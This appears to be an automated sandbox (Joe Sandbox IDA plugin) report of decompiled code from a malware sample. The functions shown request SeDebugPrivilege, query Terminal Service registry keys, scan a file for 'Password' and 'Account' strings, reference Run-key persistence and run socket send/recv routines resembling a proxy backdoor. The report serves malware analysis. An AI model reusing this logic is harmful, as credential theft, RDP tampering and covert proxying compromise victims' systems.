                                      				_v32 = 0;
                                      				_v56 = 0;
                                      				EnterCriticalSection(__ecx);
                                      				if(E0025DBF3(_t156) == 1) {
                                      					_t156 =  &_v56;
                                      					E0025D5DB( &_v56);
                                      				}
                                      				_t205 = _t202 + 0x38;
                                      				_t75 = PathFileExistsW( *(_t202 + 0x38));
                                      				_t217 = _t75;
                                      				if(_t75 != 0) {
                                      					L11:
                                      					_t206 = _t202 + 0x3c;
                                      					_t76 = PathFileExistsW( *(_t202 + 0x3c));
                                      					__eflags = _t76;
                                      					if(_t76 != 0) {
                                      						L17:
                                      						E0025C033(_t202, _t199);
                                      						E0025C01A(_t202);
                                      						_t159 = _t202;
                                      						_t79 = E0025BDDC(_t202);
                                      						__eflags = _t79;
                                      						if(_t79 != 0) {
                                      							_t160 = _t202;
                                      							_t80 = E0025BD37(_t202, _t199, _t159);
                                      							__eflags = _t80;
                                      							if(_t80 != 0) {
                                      								E0025BFB7(_t160);
                                      								_t82 = E00253412( &_v52, L"SeDebugPrivilege");
                                      								_t83 = GetCurrentProcess();
                                      								_t200 = _t82;
                                      								_t84 = E0025D609(_t83, _t82);
                                      								E00255A2D(_v56);
                                      								__eflags = _t84;
                                      								if(_t84 != 0) {
                                      									_t164 =  *(_t202 + 0x2c);
                                      									_t86 = E0025EC94( *(_t202 + 0x2c));
                                      									__eflags = _t86;
                                      									if(_t86 != 0) {
                                      										Sleep(0x3e8);
                                      										_t87 =  *(_t202 + 0x48);
                                      										__eflags = _t87;
                                      										if(_t87 != 0) {
                                      											_t211 = _t154;
                                      											__eflags = _t211 - _t87;
                                      											do {
                                      												E0025582B(_t164 & 0xffffff00 | __eflags > 0x00000000);
                                      												E0025345A( &_v52,  *((intOrPtr*)(_t202 + 0x40)) + _t211 * 4);
                                      												E0025B889( &_v56);
                                      												_t164 = _v60;
                                      												E00255A2D(_v60);
                                      												_t211 = _t211 + 1;
                                      												_v60 = _t154;
                                      												__eflags = _t211 -  *(_t202 + 0x48);
                                      											} while (_t211 <  *(_t202 + 0x48));
                                      										}
                                      										Sleep(0x1f4);
                                      										E0025345A( &_v52, _t202 + 0x28);
                                      										E0025B889( &_v56);
                                      										_t166 = _v60;
                                      										E00255A2D(_v60);
                                      										Sleep(0x1f4);
                                      										_t93 = E0025B9BC(_t200, __eflags, _v60);
                                      										__eflags = _t93;
                                      										if(_t93 != 0) {
                                      											_t94 = E0025DBF3(_t166);
                                      											__eflags = _t94 - 1;
                                      											if(_t94 == 1) {
                                      												E0025D5B4(_v56);
                                      											}
                                      											E00254B53( *((intOrPtr*)(_t202 + 0x60)), E002547F1( &_v52, _t154, _t202 + 0x58, _t202 + 0x5c));
                                      											E002547CE( &_v68);
                                      											LeaveCriticalSection(_t202);
                                      											_t154 = 8;
                                      										} else {
                                      											_push(_t202 + 0x5c);
                                      											_push(_t202 + 0x58);
                                      											_push(7);
                                      											goto L31;
                                      										}
                                      									} else {
                                      										E0025D5B4(_v56);
                                      										_push(_t202 + 0x5c);
                                      										_push(_t202 + 0x58);
                                      										_push(5);
                                      										goto L31;
                                      									}
                                      								} else {
                                      									E0025D5B4(_v56);
                                      									_push(_t202 + 0x5c);
                                      									_push(_t202 + 0x58);
                                      									_push(3);
                                      									goto L31;
                                      								}
                                      							} else {
                                      								E0025D5B4(_v56);
                                      								_push(_t202 + 0x5c);
                                      								_push(_t202 + 0x58);
                                      								_push(6);
                                      								goto L31;
                                      							}
                                      						} else {
                                      							E0025D5B4(_v56);
                                      							_push(_t202 + 0x5c);
                                      							_push(_t202 + 0x58);
                                      							_push(4);
                                      							L31:
                                      							E00254B53( *((intOrPtr*)(_t202 + 0x60)), E002547F1( &_v52));
                                      							E002547CE( &_v68);
                                      							LeaveCriticalSection(_t202);
                                      						}
                                      					} else {
                                      						E0025345A(_t215, _t206);
                                      						E0025E1A1( &_v32, __eflags, _t156, _t154);
                                      						_t183 =  *((intOrPtr*)(_t202 + 0x54));
                                      						E0026146E( *((intOrPtr*)(_t202 + 0x54)), _t199,  &_v64,  *((intOrPtr*)(_t202 + 0x60)), 3);
                                      						__eflags = _v76 - _t154;
                                      						if(_v76 != _t154) {
                                      							_t184 =  &_v28;
                                      							_t132 = E0025DD8E(_t184, _t183, _t183);
                                      							__eflags = _t132;
                                      							if(_t132 != 0) {
                                      								_push(_t184);
                                      								E0025E0DB( &_v28,  &_v52);
                                      								E0025E0C3( &_v36);
                                      							}
                                      							E00252E66( &_v52);
                                      							E0025DE8B( &_v28, __eflags);
                                      							goto L17;
                                      						} else {
                                      							E00252E66( &_v52);
                                      							goto L7;
                                      						}
                                      					}
                                      				} else {
                                      					E0025345A(_t215, _t205);
                                      					E0025E1A1( &_v32, _t217, _t156, _t154);
                                      					_t142 = E0025DBF3( &_v32);
                                      					_t193 =  *((intOrPtr*)(_t202 + 0x54));
                                      					_t143 =  &_v64;
                                      					if(_t142 != 1) {
                                      						_push(1);
                                      					} else {
                                      						_push(2);
                                      					}
                                      					_push( *((intOrPtr*)(_t202 + 0x60)));
                                      					_push(_t143);
                                      					E00252CCC( &_v48, E0026146E(_t193, _t199));
                                      					_t195 =  &_v68;
                                      					E00252E66( &_v68);
                                      					_t219 = _v52 - _t154;
                                      					if(_v52 != _t154) {
                                      						_t196 =  &_v28;
                                      						__eflags = E0025DD8E(_t196,  &_v68, _t195);
                                      						if(__eflags != 0) {
                                      							_push(_t196);
                                      							E0025E0DB( &_v28,  &_v36);
                                      							E0025E0C3( &_v36);
                                      						}
                                      						_t156 =  &_v28;
                                      						E0025DE8B( &_v28, __eflags);
                                      						goto L11;
                                      					} else {
                                      						L7:
                                      						E0025DE8B( &_v28, _t219);
                                      						_t154 = _t154 | 0xffffffff;
                                      					}
                                      				}
                                      				E00252E66( &_v36);
                                      				return _t154;
                                      			}

                                      APIs
                                      • EnterCriticalSection.KERNEL32 ref: 0025C270
                                        • Part of subcall function 0025DBF3: GetCurrentProcess.KERNEL32(?,?,00252BBD,?,00262608,?,?,00000000,?,?,?), ref: 0025DBF7
                                      • PathFileExistsW.SHLWAPI(?), ref: 0025C32E
                                      • PathFileExistsW.SHLWAPI(?), ref: 0025C28E
                                        • Part of subcall function 0025DD8E: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0025DDA5
                                        • Part of subcall function 0025DD8E: GetLastError.KERNEL32(?,?,?,00258715,?,?,?), ref: 0025DDB3
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0025C521
                                        • Part of subcall function 0025BD37: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0025BD6B
                                      • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0025C414
                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0025C561
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 1717069549-2896544425
                                      • Opcode ID: c63236e2f592dc178e88515ba4bde2c88387eea65294514565d637b78a35582d
                                      • Instruction ID: d0e075e491aaa8bb1ca49f19b3c8f12501f91ed301804b64c70858b190fc1423
                                      • Opcode Fuzzy Hash: c63236e2f592dc178e88515ba4bde2c88387eea65294514565d637b78a35582d
                                      • Instruction Fuzzy Hash: D6916071124305AFC715FFA0DC91DAEB3A8BF44316F500529F95292091EB70EA2CCF99
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025C033(void* __ecx, void* __edx) {
                                      				void* _v8;
                                      				WCHAR* _v12;
                                      				signed int _v16;
                                      				short* _v20;
                                      				short* _v24;
                                      				char _v28;
                                      				int _v32;
                                      				char _v36;
                                      				void* _t50;
                                      				void* _t62;
                                      				void* _t72;
                                      				void* _t96;
                                      
                                      				_t96 = __edx;
                                      				_t72 = __ecx;
                                      				_v8 = 0;
                                      				E00253412( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
                                      				E00253412( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
                                      					_t50 = E0025EF61( &_v8, _t96, E00253412( &_v16, L"ImagePath"),  &_v36);
                                      					E00255A2D(_v16);
                                      					E0025EF4C( &_v8);
                                      					_t103 = _t50;
                                      					if(_t50 != 0) {
                                      						E00252D08( &_v36, _t103,  &_v12);
                                      						E00252DF3( &_v36);
                                      						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
                                      							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
                                      								_t62 = E0025EF61( &_v8, _t96, E00253412( &_v16, L"ServiceDll"),  &_v36);
                                      								E00255A2D(_v16);
                                      								_t107 = _t62;
                                      								if(_t62 != 0) {
                                      									E00253264(_t72 + 0x20, E00253001( &_v16, E00252D08( &_v36, _t107,  &_v28), _t107));
                                      									E00255A2D(_v16);
                                      									_v16 = _v16 & 0x00000000;
                                      									E00255A2D(_v28);
                                      								}
                                      								E0025EF4C( &_v8);
                                      							}
                                      						}
                                      						E00255A2D(_v12);
                                      						_v12 = _v12 & 0x00000000;
                                      					}
                                      				}
                                      				E00252E66( &_v36);
                                      				E00255A2D(_v20);
                                      				E00255A2D(_v24);
                                      				return E0025EF4C( &_v8);
                                      			}

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0025C074
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0025F3B9,?,0000000A,80000001), ref: 0025EF84
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,0025F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025EFA7
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      • StrStrW.SHLWAPI(?,svchost.exe), ref: 0025C0D8
                                      • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0025C0E6
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0025C103
                                      Strings
                                      • svchost.exe, xrefs: 0025C0D0
                                      • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0025C03F
                                      • ServiceDll, xrefs: 0025C111
                                      • svchost.exe -k, xrefs: 0025C0DE
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0025C04F
                                      • ImagePath, xrefs: 0025C086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                      • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                      • API String ID: 2246401353-3333427388
                                      • Opcode ID: 3ef6d84ae489e590bc9ab8fb795d1c597b885eb16da18eee616d0a6461f979e1
                                      • Instruction ID: 3cbcffe68eff31fa2f87d064b3c10447c3974c99c8fee215310f2cf42fdca5c6
                                      • Opcode Fuzzy Hash: 3ef6d84ae489e590bc9ab8fb795d1c597b885eb16da18eee616d0a6461f979e1
                                      • Instruction Fuzzy Hash: 09413E71D20629EBCF15EBA0CD929EEB778AF04741F104165AD01B21A2EF705F29CF98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0025D7C0
                                      • CoInitialize.OLE32(00000000), ref: 0025D7C7
                                      • CoCreateInstance.OLE32(00262460,00000000,00000017,00264330,?), ref: 0025D7E5
                                      • VariantInit.OLEAUT32(?), ref: 0025D869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Initialize$CreateInitInstanceSecurityVariant
                                      • String ID: I+%$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                      • API String ID: 2382742315-2776576809
                                      • Opcode ID: 39be7e817f10581230b67f078ca2c4101b187ec597c6a2ba74435c3cf11beaa4
                                      • Instruction ID: 8bf12090eb19fcfb7748f66618b36cae825df927a2f93bd0f94682449d53a3ed
                                      • Opcode Fuzzy Hash: 39be7e817f10581230b67f078ca2c4101b187ec597c6a2ba74435c3cf11beaa4
                                      • Instruction Fuzzy Hash: 8D411C30A10245EBDB14DB95CC4CEAFBBB8EFCAB15B104098F515E7290D770A95ACB20
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • _free.LIBCMT ref: 012E76AF
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E76BB
                                      • _free.LIBCMT ref: 012E76C6
                                      • _free.LIBCMT ref: 012E76D1
                                      • _free.LIBCMT ref: 012E76DC
                                      • _free.LIBCMT ref: 012E76E7
                                      • _free.LIBCMT ref: 012E76F2
                                      • _free.LIBCMT ref: 012E76FD
                                      • _free.LIBCMT ref: 012E7708
                                      • _free.LIBCMT ref: 012E7716
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
• Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 117e0b47488f26ed3aeeb9a1a0db72c8b42d119388aebc3ccde10a0aa12d1ecf
                                      • Instruction ID: 982360d326d565d189ac46139af0addf5c5155174028275c2d4e3307a2d5b54c
                                      • Opcode Fuzzy Hash: 117e0b47488f26ed3aeeb9a1a0db72c8b42d119388aebc3ccde10a0aa12d1ecf
                                      • Instruction Fuzzy Hash: 52219676910109AFCB41EF94CC94DEE7BF9FF28254F4085A6F6199B120EB31EA558F80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 97%
                                      			E0025878B(intOrPtr __ecx, CHAR* _a4) {
                                      				char _v12;
                                      				long _v16;
                                      				void* _v20;
                                      				long _v24;
                                      				intOrPtr _v28;
                                      				void* _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _t96;
                                      				void* _t101;
                                      				char _t103;
                                      				void* _t124;
                                      				intOrPtr _t126;
                                      				char _t127;
                                      				long _t132;
                                      				void* _t134;
                                      				void* _t141;
                                      				void* _t145;
                                      				void* _t146;
                                      				intOrPtr* _t163;
                                      				intOrPtr* _t165;
                                      				void* _t166;
                                      				void* _t167;
                                      				void* _t168;
                                      				void* _t170;
                                      				intOrPtr _t171;
                                      				intOrPtr* _t172;
                                      				void* _t173;
                                      				intOrPtr _t174;
                                      				intOrPtr* _t176;
                                      				CHAR* _t177;
                                      				void* _t178;
                                      				void* _t179;
                                      
                                      				_v36 = __ecx;
                                      				_t173 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
                                      				if(_t173 != 0xffffffff) {
                                      					_t132 = GetFileSize(_t173, 0);
                                      					_v16 = _t132;
                                      					_t170 = E00255ADB(_t132);
                                      					_v32 = _t170;
                                      					E00251052(_t170, 0, _t132);
                                      					_v24 = _v24 & 0x00000000;
                                      					_t179 = _t178 + 0xc;
                                      					ReadFile(_t173, _t170, _t132,  &_v24, 0);
                                      					CloseHandle(_t173);
                                      					_t174 = E00255A3C(0x400000);
                                      					_v28 = _t174;
                                      					_a4 = E00255A3C(0x104);
                                      					_t96 = E00255A3C(0x104);
                                      					_t141 = 0;
                                      					_v12 = _t96;
                                      					_t134 = 0;
                                      					__eflags = _v16;
                                      					if(_v16 <= 0) {
                                      						L36:
                                      						E00255A2D(_a4);
                                      						E00255A2D(_v12);
                                      						return E00255A2D(_t174);
                                      					} else {
                                      						goto L3;
                                      					}
                                      					do {
                                      						L3:
                                      						_t165 =  *((intOrPtr*)(_t134 + _t170));
                                      						_t13 = _t165 - 0x21; // -33
                                      						__eflags = _t13 - 0x5d;
                                      						if(_t13 > 0x5d) {
                                      							goto L28;
                                      						}
                                      						__eflags = _t165 - 0x3d;
                                      						if(_t165 == 0x3d) {
                                      							goto L28;
                                      						}
                                      						 *((char*)(_t141 + _t174)) = _t165;
                                      						_t141 = _t141 + 1;
                                      						__eflags = _t165;
                                      						if(_t165 != 0) {
                                      							__eflags =  *((char*)(_t141 + _t174 - 8)) - 0x50;
                                      							if( *((char*)(_t141 + _t174 - 8)) != 0x50) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x61;
                                      							if( *((char*)(_t141 + _t174 - 7)) != 0x61) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x73;
                                      							if( *((char*)(_t141 + _t174 - 6)) != 0x73) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x73;
                                      							if( *((char*)(_t141 + _t174 - 5)) != 0x73) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x77;
                                      							if( *((char*)(_t141 + _t174 - 4)) != 0x77) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x6f;
                                      							if( *((char*)(_t141 + _t174 - 3)) != 0x6f) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x72;
                                      							if( *((char*)(_t141 + _t174 - 2)) != 0x72) {
                                      								goto L28;
                                      							}
                                      							__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x64;
                                      							if( *((char*)(_t141 + _t174 - 1)) == 0x64) {
                                      								__eflags =  *_t170 - 0xd0;
                                      								_t101 = 2;
                                      								_t145 = 9;
                                      								_t102 =  !=  ? _t145 : _t101;
                                      								_t146 = ( !=  ? _t145 : _t101) + _t134;
                                      								_t103 =  *((intOrPtr*)(_t146 + _t170));
                                      								_t166 = 0;
                                      								__eflags = _t103 - 0x20;
                                      								if(_t103 <= 0x20) {
                                      									L35:
                                      									_t60 =  &_v12; // 0x50
                                      									_v52 = 0;
                                      									_v48 = 0;
                                      									 *((char*)(_t166 +  *_t60)) = 0;
                                      									_v44 = 0;
                                      									E002531EC( &_v20,  *_t60);
                                      									_t66 =  &_a4; // 0x50
                                      									E002531EC( &_v16,  *_t66);
                                      									E00253264( &_v44, E00252ECA( &_v20, __eflags,  &_v32));
                                      									E00255A2D(_v32);
                                      									E00253264( &_v48, E00252ECA( &_v16, __eflags,  &_v32));
                                      									E00255A2D(_v32);
                                      									_v40 = 5;
                                      									E00253264( &_v52, E00253412( &_v32, 0x262608));
                                      									E00255A2D(_v32);
                                      									E00251EB9(_t179 - 0x10,  &_v52);
                                      									E00251EEF(_v36);
                                      									E00255A2D(_v16);
                                      									E00255A2D(_v20);
                                      									E0025138F( &_v52);
                                      									goto L36;
                                      								}
                                      								_t163 = _t146 + _t170;
                                      								__eflags = _t163;
                                      								_t58 =  &_v12; // 0x50
                                      								_t171 =  *_t58;
                                      								while(1) {
                                      									__eflags = _t103 - 0x7f;
                                      									if(_t103 >= 0x7f) {
                                      										goto L35;
                                      									}
                                      									__eflags = _t103 - 0x21;
                                      									if(_t103 == 0x21) {
                                      										goto L35;
                                      									}
                                      									 *((char*)(_t166 + _t171)) = _t103;
                                      									_t166 = _t166 + 1;
                                      									_t163 = _t163 + 1;
                                      									_t103 =  *_t163;
                                      									__eflags = _t103 - 0x20;
                                      									if(_t103 > 0x20) {
                                      										continue;
                                      									}
                                      									goto L35;
                                      								}
                                      								goto L35;
                                      							}
                                      							goto L28;
                                      						}
                                      						__eflags = _t141 - 7;
                                      						if(_t141 <= 7) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 7)) - 0x41;
                                      						if( *((char*)(_t141 + _t174 - 7)) != 0x41) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 6)) - 0x63;
                                      						if( *((char*)(_t141 + _t174 - 6)) != 0x63) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 5)) - 0x63;
                                      						if( *((char*)(_t141 + _t174 - 5)) != 0x63) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 4)) - 0x6f;
                                      						if( *((char*)(_t141 + _t174 - 4)) != 0x6f) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 3)) - 0x75;
                                      						if( *((char*)(_t141 + _t174 - 3)) != 0x75) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 2)) - 0x6e;
                                      						if( *((char*)(_t141 + _t174 - 2)) != 0x6e) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *((char*)(_t141 + _t174 - 1)) - 0x74;
                                      						if( *((char*)(_t141 + _t174 - 1)) != 0x74) {
                                      							goto L28;
                                      						}
                                      						__eflags =  *_t170 - 0xd0;
                                      						_t124 = 2;
                                      						_t167 = 9;
                                      						_t125 =  !=  ? _t167 : _t124;
                                      						_t168 = 0;
                                      						_t126 = ( !=  ? _t167 : _t124) + _t134;
                                      						_v20 = _t126;
                                      						_t127 =  *((intOrPtr*)(_t126 + _t170));
                                      						__eflags = _t127 - 0x20;
                                      						if(_t127 <= 0x20) {
                                      							L19:
                                      							 *((char*)(_t168 + _a4)) = 0;
                                      							goto L28;
                                      						}
                                      						_t176 = _v20 + _t170;
                                      						__eflags = _t176;
                                      						_v20 = _t176;
                                      						_t172 = _t176;
                                      						_t177 = _a4;
                                      						while(1) {
                                      							__eflags = _t127 - 0x7f;
                                      							if(_t127 >= 0x7f) {
                                      								break;
                                      							}
                                      							_t172 = _t172 + 1;
                                      							 *((char*)(_t168 + _t177)) = _t127;
                                      							_t168 = _t168 + 1;
                                      							_t127 =  *_t172;
                                      							__eflags = _t127 - 0x20;
                                      							if(_t127 > 0x20) {
                                      								continue;
                                      							}
                                      							break;
                                      						}
                                      						_t174 = _v28;
                                      						_t170 = _v32;
                                      						goto L19;
                                      						L28:
                                      						_t134 = _t134 + 1;
                                      						__eflags = _t134 - _v16;
                                      					} while (_t134 < _v16);
                                      					goto L36;
                                      				}
                                      				GetLastError();
                                      				return CloseHandle(_t173);
                                      			}

                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 002587A8
                                      • GetLastError.KERNEL32 ref: 002587B5
                                      • CloseHandle.KERNEL32(00000000), ref: 002587BC
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 002587C9
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002587F9
                                      • CloseHandle.KERNEL32(00000000), ref: 00258800
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateErrorLastReadSize
                                      • String ID: Password$Password
                                      • API String ID: 1366138817-7788977
                                      • Opcode ID: ba9ab555365a743c2eb867b79f5677404768a5529ad42f78ba2d44088c3b62c7
                                      • Instruction ID: 180ba1c2e73587d61ed15c6771b8945e68adfed6d2cc62ee8396841d83a00001
                                      • Opcode Fuzzy Hash: ba9ab555365a743c2eb867b79f5677404768a5529ad42f78ba2d44088c3b62c7
                                      • Instruction Fuzzy Hash: 54815770C34145AEEB20EFA4C8A17BDBB64AF11346F204069E84267293CFB54D6ECB59
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                        • Part of subcall function 0025D344: WSAStartup.WS2_32(00000202,?), ref: 0025D361
                                        • Part of subcall function 0025D344: socket.WS2_32(00000002,00000001,00000000), ref: 0025D372
                                        • Part of subcall function 0025D344: gethostbyname.WS2_32(?), ref: 0025D380
                                        • Part of subcall function 0025D344: htons.WS2_32(?), ref: 0025D3A6
                                        • Part of subcall function 0025D344: connect.WS2_32(00000000,?,00000010), ref: 0025D3B9
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0025D137
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0025D14C
                                      • recv.WS2_32(00000000,?,00000002,00000000), ref: 0025D15F
                                      • htons.WS2_32(?), ref: 0025D16D
                                      • recv.WS2_32(00000000,?,00000004,00000000), ref: 0025D183
                                      • wsprintfA.USER32 ref: 0025D1D2
                                      • recv.WS2_32(00000000,?,000000FF,00000000), ref: 0025D1EA
                                        • Part of subcall function 0025D25C: send.WS2_32(00000000,?,00000001,00000000), ref: 0025D27B
                                        • Part of subcall function 0025D25C: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0025D290
                                        • Part of subcall function 0025D25C: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0025D2A5
                                        • Part of subcall function 0025D2BD: ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0025D2DA
                                        • Part of subcall function 0025D2BD: recv.WS2_32(00000000,?,00000800,00000000), ref: 0025D30E
                                        • Part of subcall function 0025D2BD: send.WS2_32(00000000,?,00000000,00000000), ref: 0025D327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
